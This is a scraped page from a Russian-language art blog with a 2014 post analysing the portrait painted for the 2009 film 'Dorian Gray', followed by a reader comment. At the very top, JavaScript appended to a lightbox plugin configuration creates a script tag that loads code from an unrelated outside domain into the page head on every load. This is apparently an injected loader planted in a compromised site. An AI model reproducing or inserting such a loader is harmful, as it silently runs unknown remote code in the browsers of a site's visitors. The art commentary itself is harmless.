, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Портрет Дориана Грея

Автор: Дмитрий Алмазов | 26 Мар 2014

Портрет Дориана ГреяВсе мы  со школьной скамьи знакомы с великим произведением английского классика. Вы, наверное, догадались, что классик - это Оскар Уайльда, а произведение - "Портрет Дориана Грея". Кого-то эта книга завораживает, кого-то огорчает, но она никого не оставляет равнодушным к собственному содержанию.  На протяжении  последних ста двадцати лет было создано огромное количество иллюстраций к данному литературному творению,  многие из них стали настоящими произведениями искусства и заслуживают пристального внимания человечества. Но я предлагаю познакомиться не с иллюстрациями к книгам, а с портретом, который был для  последней экранизации, произведенной Туманным Альбионом.

Фильм создан в 2009 году, главную роль играет знаменитый английский   актер - Бен Барнс. В картине присутствует замечательный портрет, который написан неизвестным художником. Уже пятый год кинокритики и искусствоведы пытаются установить авторства. Но не будем выяснять с вами авторства. Мы с вами изучим детально портрет главного героя.

Во-первых, обратим внимание на цветовое своеобразие холста. Если взглянуть полотно мельком, то на нем присутствуют только белый и черный цвет, но  если его рассматривать дольше и лучше, то вы увидите и темно-синий, и коричневый, и молочный, и бежевый, и даже темно-зеленый. Хотя это разнообразие не спасает положение: нам все равно кажется, что данная картина - это антагонизм черного и белого. И, действительно, так и есть. Черные волосы "борются" со светлым лицом; черный жилет "борется" с белой, даже можно сказать кипенной рубашкой; темный фон также гордо противостоит белому свету.

Во-вторых, познакомимся с очертаниями фигуры. Точно можно сказать, что портрет выполнен в направлении реализма. На холсте присутствуют, как и четкие, плавные линии, так и заостренные, геометрические линии. Сложные орнаменты отсутствуют. Зато есть одна важная деталь - детализированная пропись лица, а точнее скул и лба. Также детализированы волосы: присмотритесь, и вы сразу увидите укладку " волос к волоску".

Фигуры и очертания обрамляются линиями средней толщины, все линии выполнены в холодных оттенках.

В-третьих,  рассмотрим одеяние главного героя романа. Дориан Грей предстает пред нами в темно-сером, цвета мокрого асфальта, жилете и белой рубашке с воздушными рукавами. На шее небольшой галстук, который завяз классическим, но слегка небрежным, узлом. Костюм соответствует моде викторианской Англии. Кстати, подобный наряд, как и сто лет назад, остается актуальным и его смело модно назвать классикой. Неброские, сдержанные цвета помогают отображать молодость героя. Плавные линии в наряде подчеркивают наивность изображенного и его легкость. Только воздушные рукава, переходя из белого в бежевый, вносят дисбаланс в этот эфемерный образ.

Итак, Портрет Дориана Грея – это настоящее совершенство и в литературе, и в живописи, на все времена. Чтобы познакомится с данным портретом, нужно всего лишь включить фильм и наслаждаться просмотром!

Заказать классический портрет или исторический портрет можно написав нам в разделе контакты или на почту.

Темы: Портрет | 1 отзыв »

Один отзыв на “Портрет Дориана Грея”

  1. Лики пишет:
    27 Мар 2014 в 20:55

    Портрет Дориана Грея не только культовая книга, но и, оказывается, интересная картина. Я раньше не замечала, что в ней есть столько замечательных живописных аспектов, которые могут претендовать на произведение искусства. Снова хочется пересмотреть последнюю экранизацию, чтобы детально рассмотреть пункты, описанные в этой статье.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress